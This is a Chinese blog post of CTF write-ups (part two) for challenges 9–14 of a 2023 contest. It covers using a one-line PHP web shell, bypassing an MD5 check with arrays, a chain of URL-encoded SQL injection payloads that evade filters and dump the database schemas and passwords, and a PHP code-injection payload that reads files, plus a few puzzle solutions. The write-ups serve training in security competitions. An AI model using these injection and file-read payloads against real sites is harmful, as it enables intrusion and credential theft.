乐于分享
好东西不私藏

2023ctf大赛真题高质量wp!(下)

2023ctf大赛真题高质量wp!(下)

希望看完之后可以对你熟悉ctf比赛以及提高技术水平有所帮助!

9.where_is_the_flag

进⼊靶机

 标准的⼀句话⽊⻢ 打开蚁剑 添加数据

 由此可以轻松拿到flag1

 返回根⽬录⼜能找到flag2

 最后flag3需要打开虚拟终端 echo $FLAG3

 得到完整flag

10.绕进你的心里

 分析命令⾏ get输⼊两个MD5值相等但不同的两个值 可以⽤数组的⽅式绕过 ?hongmeng[0]=1&shennong[0]=2 接下来是post输⼊的pan_gu stripos函数要求字符串中要包含2023ISCTF preg_match正则匹配函数 /i 表示不区分⼤⼩写,/s 表示字⺟,不能让它匹配到ISCTF,垃圾数据逃 逸,⼤量垃圾数据使检测的过程崩溃

 我在160k字典后⾯加上了2023ISCTF

 得到flag

11.easy_website

 sql注⼊,'显示数据库查询失败,说明是'闭合,⽽且有过滤 order变成了der,空格也没了 ⽤url编码%6f代替o绕过or过滤,+代替空格 1'+%6frder+by+4+# ⼆分法继续往下爆字段

 最后发现字段为1 经过测试发现union select也被过滤 全部转换为url编码 爆schema 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+schema_name+from+inf%6frmation_sche ma.schemata+#

 要让他显示多⾏内容要⽤到groupconcat函数 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(schema_name)+from+inf%6 frmation_schema.schemata+#

 找到users的库⾥,继续爆table where指定在users的库中 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(table_name)+from+inf%6frm ation_schema.tables+where+table_schema='users'+#

 爆column 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(column_name)+from+inf%6f rmation_schema.columns+where+table_name='user'+# 在password列⾥找,明指 users数据库下的users表 and也⽤url编码绕过过滤 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(column_name)+from+inf%6f rmation_schema.columns+where+table_schema='users' +a%6ed+table_name='users'+# 

 最后看字段内容 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+passw%6frd+from+users.users+%23 

 还是⽤groupconcat 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(passw%6frd)+from+users.us ers+#

 得到flag

12.wafr

 找到没被过滤的并且能够读取⽂件的函数 var_dump() 显示参数信息/输出内容 file_get_contents() 将⽂件读⼊⼀个字符串 var_dump(file_get_contents("⽂件名")); file_get_contents将⽂件的内容以字符串的形式返回, var_dump再对字符串进⾏输出,但是file_get_contents不⽀持通配符,那么需要⼀个函数⽀持通配符并 且能够返回匹配的flag⽂件路径 glob() 返回⼀个包含匹配的指定⽂件名或⽬录的数组,可以使⽤通配符 glob('/f*')[0] -> array[0]=flag.txt *通配符匹配f开头的⽂件名

 post:code=var_dump(file_fet_contents(glob('/f*')[0])) 得到flag

13.签到题

 下载后是两张图⽚

 随便拼接⼀下,扫描到蓝鲨信息公众号 得到flag

14.你说爱我?尊嘟假嘟

 下载后改后缀为zip 解压得到⼀个 这是⼀个三元密码查到是Ook密码,⽤Ook解码需要转换格式,其中Ook.最多,把⽂档中的你说爱我全部替换为Ook. 经过测试尊嘟替换为Ook!假嘟替换为Ook?

 https://www.splitbrain.org/services/ook

 ild3l4pXejwPcCwJsPAOq7sJczdRdTsJcCEUsP1Z ⽤base64解码,这⾥是变种base64使⽤0-9a-zA-Z+/ =为填充 得到flag

有任何问题都可以随时关注私信!